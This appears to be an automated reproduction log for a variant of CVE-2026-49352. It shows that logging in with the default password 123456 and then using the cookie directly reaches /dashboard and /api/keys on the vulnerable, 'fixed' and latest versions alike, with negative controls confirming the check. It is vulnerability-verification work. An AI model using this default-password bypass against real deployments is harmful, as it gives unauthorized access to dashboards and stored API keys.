[variant 14:43:07] === CVE-2026-49352 VARIANT reproduction start (default-password bypass) === [variant 14:43:07] Project cache dir: /data/pruva/project-cache/4363a60d-57f6-4170-9aa0-2e4f54c86001 [variant 14:43:07] Default password under test: 123456 (INITIAL_PASSWORD fallback) [variant 14:43:07] vuln: repo already present at /data/pruva/project-cache/4363a60d-57f6-4170-9aa0-2e4f54c86001/repo [variant 14:43:07] fixed: repo already present at /data/pruva/project-cache/4363a60d-57f6-4170-9aa0-2e4f54c86001/repo-fixed [variant 14:43:07] latest: repo already present at /data/pruva/project-cache/4363a60d-57f6-4170-9aa0-2e4f54c86001/repo-latest [variant 14:43:07] vuln: build already present, reusing [variant 14:43:07] fixed: build already present, reusing [variant 14:43:07] latest: build already present, reusing [variant 14:43:07] --- vuln : start server (no JWT_SECRET, fresh DATA_DIR) on http://127.0.0.1:20140 --- [variant 14:43:07] vuln server PID=5923 [variant 14:43:08] vuln: server healthy [variant 14:43:08] vuln POST /api/auth/login {password:123456} -> 200 [variant 14:43:08] vuln GET /dashboard (default-pw cookie) -> 200 [variant 14:43:08] vuln GET /api/keys (default-pw cookie) -> 200 [variant 14:43:08] vuln negative control: no-cookie /dashboard -> 307 [variant 14:43:11] --- fixed : start server (no JWT_SECRET, fresh DATA_DIR) on http://127.0.0.1:20141 --- [variant 14:43:11] fixed server PID=5971 [variant 14:43:12] fixed: server healthy [variant 14:43:12] fixed POST /api/auth/login {password:123456} -> 200 [variant 14:43:12] fixed GET /dashboard (default-pw cookie) -> 200 [variant 14:43:12] fixed GET /api/keys (default-pw cookie) -> 200 [variant 14:43:12] fixed negative control: no-cookie /dashboard -> 307 [variant 14:43:14] --- latest : start server (no JWT_SECRET, fresh DATA_DIR) on http://127.0.0.1:20142 --- [variant 14:43:14] latest server PID=6019 [variant 14:43:15] latest: server healthy [variant 14:43:15] latest POST /api/auth/login {password:123456} -> 200 [variant 14:43:15] latest GET /dashboard (default-pw cookie) -> 200 [variant 14:43:15] latest GET /api/keys (default-pw cookie) -> 200 [variant 14:43:15] latest negative control: no-cookie /dashboard -> 307 [variant 14:43:17] === Summary === [variant 14:43:17] VULN v0.4.41 default-pw /dashboard: 200 /api/keys: 200 [variant 14:43:17] FIXED v0.4.44 default-pw /dashboard: 200 /api/keys: 200 (expect 200/200 = BYPASS) [variant 14:43:17] LATEST v0.4.80 remote default-pw /dashboard: 200 /api/keys: 200 (direct cookie, bypasses UI guard) [variant 14:43:17] === VARIANT CONFIRMED: default-password auth bypass survives the JWT fix (v0.4.44) === [variant 14:43:17] === VARIANT also bypasses the v0.4.80 'remote default-password guard' via direct cookie use === [variant 14:43:17] Exit 0: variant (default-password auth bypass) confirmed on the FIXED version